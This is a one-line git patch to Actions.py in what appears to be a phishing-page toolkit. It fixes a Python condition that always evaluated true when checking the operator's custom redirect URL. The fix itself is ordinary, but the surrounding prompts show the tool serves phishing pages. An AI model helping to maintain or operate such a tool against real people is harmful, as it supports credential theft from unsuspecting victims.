From 882bcc9f00cbff1d3319dfea3af3548f314da72f Mon Sep 17 00:00:00 2001 From: Usama Abdul Sattar Date: Tue, 30 Oct 2018 16:59:46 +0500 Subject: [PATCH] Update Actions.py --- Defs/Actions.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Defs/Actions.py b/Defs/Actions.py index ce02b87..27417dc 100644 --- a/Defs/Actions.py +++ b/Defs/Actions.py @@ -223,7 +223,7 @@ def inputCustom(): #Question where user can input custom web-link print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT)) print("\n {0}Insert a custom redirect url:".format(RED, DEFAULT)) custom = input("\n {0}CUSTOM URL>>> {1}".format(RED, DEFAULT)) - if 'http://' or 'https://' in custom: + if 'http://' in custom or 'https://' in custom: pass else: custom = 'http://' + custom